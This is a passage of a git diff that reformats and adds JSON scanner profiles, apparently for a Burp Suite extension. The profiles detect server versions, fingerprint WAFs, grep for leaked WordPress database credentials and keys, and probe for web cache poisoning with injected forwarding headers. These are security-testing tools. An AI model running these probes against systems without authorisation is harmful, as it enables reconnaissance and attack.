([\\d.]+)","true,Or,mod_apreq\\d-([\\d.\\/]+)","true,Or,mod_fastcgi\\/([\\d.]+)","true,Or,mod_jk\\/([\\d.]+)","true,Or,mod_ssl\\/([\\d.]+)","true,Or,mod_perl\\/([\\d.]+)","true,Or,mustache\\.version\\s*\u003d\\s*\u0027([\\d.]+)\u0027"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Version in Headers","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Version_Headers",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,accounting\\.js v([\\d.]+)",
+ "true,Or,akka-http\\/([\\d.]+)",
+ "true,Or,Alterian-CME\\/([\\d.]+)",
+ "true,Or,([-\\d.]+)amzn1.x86_64",
+ "true,Or,AOLserver\\/([\\d.]+)",
+ "true,Or,Apache\\/([\\d.]+(?: \\([ \\w]+\\))?)",
+ "true,Or,Apache-Coyote\\/([\\d.]+)",
+ "true,Or,Apache Subversion\u003c\\/a\u003e\\s+version\\s+([\\d.]+(?:\\s*\\(r\\d+\\))?)",
+ "true,Or,Apache Tomcat\\/([\\d.]+)",
+ "true,Or,ARR\\/([\\d.]+)",
+ "true,Or,Artifactory\\/([\\d.]+)",
+ "true,Or,ASP\\.NET Version:([\\d.]+)",
+ "true,Or,awselb\\/([\\d.]+)",
+ "true,Or,((?i)Boa)\\/(\\d+\\.[\\d.rc]+)",
+ "true,Or,Cherokee\\/(\\d+\\.[\\d.b]+)(\\s+\\([a-zA-Z]+\\))?",
+ "true,Or,CKEDITOR.*version:\"([\\d.]+)\"",
+ "true,Or,Communique\\/([\\d.-]+)",
+ "true,Or,Ember\\.VERSION\\s*\u003d\\s*[\"\u0027]([\\w.]+)[\"\u0027]",
+ "true,Or,http:\\/\\/errors\\.angularjs\\.org\\/([\\d.]+)\\/",
+ "true,Or,h2o\\/([\\d.]+(-DEV)?)",
+ "true,Or,Hiawatha v([\\d.]+)",
+ "true,Or,Handlebars\\.VERSION\\s*\u003d\\s*[\"\u0027]([\\w.]+)[\"\u0027]",
+ "true,Or,IBM_HTTP_Server\\/([\\d.]+)",
+ "true,Or,IWeb\\/([\\d.]+)",
+ "true,Or,Jetty\\s?\\(?([a-z\\d.]+)\\)?",
+ "true,Or,JBoss-([\\d.]+(?:GA)?)",
+ "true,Or,JBoss-EAP\\/([\\d.]+)",
+ "true,Or,JBoss_([\\d_]+)",
+ "true,Or,JBPAPP_([\\d_]+(?:GA)?)",
+ "true,Or,JBoss\\s?Web[\\/-]{1}([\\d.]+(?:GA)?)",
+ "true,Or,\\bjdk(\\d[x\\d._]+)",
+ "true,Or,Joomla! ([\\d.]+)",
+ "true,Or,\\bJSF\\/([\\d.]+)",
+ "true,Or,JSP\\/([\\d.]+)",
+ "true,Or,jQuery JavaScript Library v([\\d.]+)",
+ "true,Or,jQuery UI ([\\d.]+)",
+ "true,Or,jQuery UI Core ([\\d.]+)",
+ "true,Or,jQuery UI Touch Punch ([\\d.]+)",
+ "true,Or,jQuery hashchange event - v([\\d.]+)",
+ "true,Or,jQuery Tiny Pub\\/Sub - v([\\d.]+)",
+ "true,Or,jquery[\\/-]([\\d-.]+)",
+ "true,Or,jQuery v([\\d.]+)",
+ "true,Or,Liferay Portal Enterprise Edition ([\\d.]+)",
+ "true,Or,lighttpd\\/([\\d.]+)",
+ "true,Or,Linux (\\d+\\.[a-z0-9\\.\\-_]+)",
+ "true,Or,LiteSpeed\\/([\\d.]+)",
+ "true,Or,Microsoft-HTTPAPI\\/([\\d.]+)",
+ "true,Or,Microsoft-IIS\\/([\\d.]+)",
+ "true,Or,Microsoft \\.NET Framework Version:([\\d.]+)",
+ "true,Or,Microsoft \\.NET Framework ([\\d.]+)",
+ "true,Or,MicrosoftSharePointTeamServices: ([\\d.]+)",
+ "true,Or,mod_apreq\\d-([\\d.\\/]+)",
+ "true,Or,mod_fastcgi\\/([\\d.]+)",
+ "true,Or,mod_jk\\/([\\d.]+)",
+ "true,Or,mod_ssl\\/([\\d.]+)",
+ "true,Or,mod_perl\\/([\\d.]+)",
+ "true,Or,mustache\\.version\\s*\u003d\\s*\u0027([\\d.]+)\u0027"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Version in Headers",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/WAF_Found.bb b/profiles/WAF_Found.bb
old mode 100644
new mode 100755
index bd3d2d2..76db5cc
--- a/profiles/WAF_Found.bb
+++ b/profiles/WAF_Found.bb
@@ -1 +1,165 @@
-[{"Name":"WAF_Found","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,Cloudflare","true,Or,Imperva","true,Or,NetScaler","true,Or,wzws-waf-cgi","true,Or,X-Powered-By-360WZB","true,Or,aeSecure","true,Or,AL-SESS","true,Or,aliyun","true,Or,Anquanbao","true,Or,WZWS-RAY","true,Or,ArvanCloud","true,Or,ASPA-Cache-Status","true,Or,X-ASPNET-Version","true,Or,cz_astra_csrf_cookie","true,Or,awselb/2.0","true,Or,Yunjiasu","true,Or,barracuda_","true,Or,barra_counter_session","true,Or,BinarySec","true,Or,BigIP","true,Or,BlockDos.net","true,Or,BDWAF","true,Or,CdnNsWAF","true,Or,ChinaCache","true,Or,ACE XML Gateway","true,Or,Cloudbric","true,Or,cloudflare","true,Or,__cfuid\u003d","true,Or,CloudfloorDNS","true,Or,cloudfront","true,Or,FORTIWAFSID","true,Or,hwclouds.com","true,Or,Incapsula","true,Or,KeyCDN","true,Or,AkamaiGHost","true,Or,PowerCDN","true,Or,X-Qiniu-CDN","true,Or,squid/","true,Or,Sucuri","true,Or,waf.tencent-cloud.com","true,Or,xVarnish-WAF","true,Or,WatchGuard","true,Or,WebKnight","true,Or,ZScaler","true,Or,X-Powered-By-360WZB","true,Or,ak_bmsc","true,Or,AkamaiGHost","true,Or,X-Powered-By-Anquanbao","true,Or,BNI__BARRACUDA_LB_COOKIE","true,Or,BNI_persistence","true,Or,BinarySec","true,Or,x-binarysec-via","true,Or,x-binarysec-nocache","true,Or,ChinaCache","true,Or,Server: ACE XML Gateway","true,Or,ns_af","true,Or,citrix_ns_id","true,Or,NSC_","true,Or,Cneonction","true,Or,Coection","true,Or,NS-CACHE","true,Or,X-client-ip","true,Or,pwcount","true,Or,cloudflare-nginx","true,Or,__cfduid","true,Or,cloudflare","true,Or,X-dotDefender","true,Or,BIG-IP-F5","true,Or,MRHSession","true,Or,BigIP","true,Or,BIG-IP","true,Or,BIGIP","true,Or,F5_ST","true,Or,F5_HT","true,Or,LastMRH_Session","true,Or,MRHSequence","true,Or,MRHSHint","true,Or,Set-Cookie: TS","true,Or,BIGipServer","true,Or,uRoamTestCookie","true,Or,MRHCId","true,Or,uRoamTestCookie","true,Or,MRHIntranetSession","true,Or,F5-TrafficShield","true,Or,fgd_icon","true,Or,FORTIWAFSID","true,Or,WODSESSION","true,Or,X-Backside-Transport","true,Or,X-CDN: Incapsula","true,Or,incap_ses","true,Or,Set-Cookie: visid","true,Or,Set-Cookie: AL","true,Or,Server: Mission Control Application Shield","true,Or,mod_security","true,Or,Mod_Security","true,Or,NOYB","true,Or,NCI__SessionId","true,Or,NSFocus","true,Or,PowerCDN","true,Or,profense","true,Or,safedog-flow-item","true,Or,Safedog","true,Or,st8id","true,Or,Secure Entry Server","true,Or,WT263CDN","true,Or,ZENEDGE","true,Or,Served-By-Zenedge"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"WAF Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"WAF Found\n\nCheck the results against https://github.com/0xInfection/Awesome-WAF","RemediationDetail":"WAF Found","IssueBackground":"WAF Found","RemediationBackground":"WAF Found","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "WAF_Found",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Cloudflare",
+ "true,Or,Imperva",
+ "true,Or,NetScaler",
+ "true,Or,wzws-waf-cgi",
+ "true,Or,X-Powered-By-360WZB",
+ "true,Or,aeSecure",
+ "true,Or,AL-SESS",
+ "true,Or,aliyun",
+ "true,Or,Anquanbao",
+ "true,Or,WZWS-RAY",
+ "true,Or,ArvanCloud",
+ "true,Or,ASPA-Cache-Status",
+ "true,Or,X-ASPNET-Version",
+ "true,Or,cz_astra_csrf_cookie",
+ "true,Or,awselb/2.0",
+ "true,Or,Yunjiasu",
+ "true,Or,barracuda_",
+ "true,Or,barra_counter_session",
+ "true,Or,BinarySec",
+ "true,Or,BigIP",
+ "true,Or,BlockDos.net",
+ "true,Or,BDWAF",
+ "true,Or,CdnNsWAF",
+ "true,Or,ChinaCache",
+ "true,Or,ACE XML Gateway",
+ "true,Or,Cloudbric",
+ "true,Or,cloudflare",
+ "true,Or,__cfuid\u003d",
+ "true,Or,CloudfloorDNS",
+ "true,Or,cloudfront",
+ "true,Or,FORTIWAFSID",
+ "true,Or,hwclouds.com",
+ "true,Or,Incapsula",
+ "true,Or,KeyCDN",
+ "true,Or,AkamaiGHost",
+ "true,Or,PowerCDN",
+ "true,Or,X-Qiniu-CDN",
+ "true,Or,squid/",
+ "true,Or,Sucuri",
+ "true,Or,waf.tencent-cloud.com",
+ "true,Or,xVarnish-WAF",
+ "true,Or,WatchGuard",
+ "true,Or,WebKnight",
+ "true,Or,ZScaler",
+ "true,Or,X-Powered-By-360WZB",
+ "true,Or,ak_bmsc",
+ "true,Or,AkamaiGHost",
+ "true,Or,X-Powered-By-Anquanbao",
+ "true,Or,BNI__BARRACUDA_LB_COOKIE",
+ "true,Or,BNI_persistence",
+ "true,Or,BinarySec",
+ "true,Or,x-binarysec-via",
+ "true,Or,x-binarysec-nocache",
+ "true,Or,ChinaCache",
+ "true,Or,Server: ACE XML Gateway",
+ "true,Or,ns_af",
+ "true,Or,citrix_ns_id",
+ "true,Or,NSC_",
+ "true,Or,Cneonction",
+ "true,Or,Coection",
+ "true,Or,NS-CACHE",
+ "true,Or,X-client-ip",
+ "true,Or,pwcount",
+ "true,Or,cloudflare-nginx",
+ "true,Or,__cfduid",
+ "true,Or,cloudflare",
+ "true,Or,X-dotDefender",
+ "true,Or,BIG-IP-F5",
+ "true,Or,MRHSession",
+ "true,Or,BigIP",
+ "true,Or,BIG-IP",
+ "true,Or,BIGIP",
+ "true,Or,F5_ST",
+ "true,Or,F5_HT",
+ "true,Or,LastMRH_Session",
+ "true,Or,MRHSequence",
+ "true,Or,MRHSHint",
+ "true,Or,Set-Cookie: TS",
+ "true,Or,BIGipServer",
+ "true,Or,uRoamTestCookie",
+ "true,Or,MRHCId",
+ "true,Or,uRoamTestCookie",
+ "true,Or,MRHIntranetSession",
+ "true,Or,F5-TrafficShield",
+ "true,Or,fgd_icon",
+ "true,Or,FORTIWAFSID",
+ "true,Or,WODSESSION",
+ "true,Or,X-Backside-Transport",
+ "true,Or,X-CDN: Incapsula",
+ "true,Or,incap_ses",
+ "true,Or,Set-Cookie: visid",
+ "true,Or,Set-Cookie: AL",
+ "true,Or,Server: Mission Control Application Shield",
+ "true,Or,mod_security",
+ "true,Or,Mod_Security",
+ "true,Or,NOYB",
+ "true,Or,NCI__SessionId",
+ "true,Or,NSFocus",
+ "true,Or,PowerCDN",
+ "true,Or,profense",
+ "true,Or,safedog-flow-item",
+ "true,Or,Safedog",
+ "true,Or,st8id",
+ "true,Or,Secure Entry Server",
+ "true,Or,WT263CDN",
+ "true,Or,ZENEDGE",
+ "true,Or,Served-By-Zenedge"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "WAF Found",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "WAF Found\n\nCheck the results against https://github.com/0xInfection/Awesome-WAF",
+ "RemediationDetail": "WAF Found",
+ "IssueBackground": "WAF Found",
+ "RemediationBackground": "WAF Found",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/WP_Config.bb b/profiles/WP_Config.bb
old mode 100644
new mode 100755
index 0b1d8d9..0a93762
--- a/profiles/WP_Config.bb
+++ b/profiles/WP_Config.bb
@@ -1 +1,59 @@
-[{"Name":"WP_Config","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,define(.{0,20})?(DB_CHARSET|NONCE_SALT|LOGGED_IN_SALT|AUTH_SALT|NONCE_KEY|DB_HOST|DB_PASSWORD|AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|DB_NAME|DB_USER)(.{0,20})?[\u0027|\"].{10,120}[\u0027|\"]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"WP Config","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "WP_Config",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,define(.{0,20})?(DB_CHARSET|NONCE_SALT|LOGGED_IN_SALT|AUTH_SALT|NONCE_KEY|DB_HOST|DB_PASSWORD|AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|DB_NAME|DB_USER)(.{0,20})?[\u0027|\"].{10,120}[\u0027|\"]"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "WP Config",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/WebCachePoisoning.bb b/profiles/WebCachePoisoning.bb
index 6a9af3d..3553161 100755
--- a/profiles/WebCachePoisoning.bb
+++ b/profiles/WebCachePoisoning.bb
@@ -1 +1,134 @@
-[{"Name":"WebCachePoisoning","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["STRINGFORREQUEST"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,TOKEN1337"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Web-Cache-Poisoning","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Web Cache poisoning with payload: \u003cbr\u003e\u003cpayload\u003e\n\n\u003cbr\u003e\u003cbr\u003eBy James Kettle:\u003cbr\u003ehttps://portswigger.net/blog/practical-web-cache-poisoning","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"","replace":"X-Forwarded-For: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Host: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Forwarded-Server: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Forwarded-Scheme: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Original-URL: TOKEN1337","regex":"String"},{"type":"Request","match":"","replace":"X-Rewrite-URL: TOKEN1337","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "WebCachePoisoning",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,STRINGFORREQUEST"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,TOKEN1337"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 3,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Web-Cache-Poisoning",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Web Cache poisoning with payload: \u003cbr\u003e\u003cpayload\u003e\n\n\u003cbr\u003e\u003cbr\u003eBy James Kettle:\u003cbr\u003ehttps://portswigger.net/blog/practical-web-cache-poisoning",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Forwarded-For: TOKEN1337",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Host: TOKEN1337",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Forwarded-Server: TOKEN1337",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Forwarded-Scheme: TOKEN1337",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Original-URL: TOKEN1337",
+ "regex": "String"
+ },
+ {
+ "type": "Request",
+ "match": "",
+ "replace": "X-Rewrite-URL: TOKEN1337",
+ "regex": "String"
+ }
+ ],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/WeblogicServer-UDDI_Explorer.bb b/profiles/WeblogicServer-UDDI_Explorer.bb
old mode 100644
new mode 100755
index 9103340..524c7a5
--- a/profiles/WeblogicServer-UDDI_Explorer.bb
+++ b/profiles/WeblogicServer-UDDI_Explorer.bb
@@ -1 +1,59 @@
-[{"Name":"WeblogicServer-UDDI_Explorer","Enabled":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["/uddiexplorer/searchpublicregistries.jsp"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"WeblogicServer-UDDI Explorer","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"https://www.exploit-db.com/ghdb/4991","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "WeblogicServer-UDDI_Explorer",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 3,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,All Request,Value,/uddiexplorer/searchpublicregistries.jsp"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "WeblogicServer-UDDI Explorer",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "https://www.exploit-db.com/ghdb/4991",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Wordpress-SensitiveDirectories.bb b/profiles/Wordpress-SensitiveDirectories.bb
new file mode 100755
index 0000000..6f42eda
--- /dev/null
+++ b/profiles/Wordpress-SensitiveDirectories.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "Wordpress-SensitiveDirectories",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,/wp-content/uploads/wp-backup-plus/"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Wordpress-SensitiveDirectories",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Wordpress Sensitive Directories:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5032/",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/X-Content-Type-Options.bb b/profiles/X-Content-Type-Options.bb
new file mode 100755
index 0000000..4d2bf31
--- /dev/null
+++ b/profiles/X-Content-Type-Options.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "X-Content-Type-Options",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,X-Content-Type-Options: nosniff"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": true,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 1,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
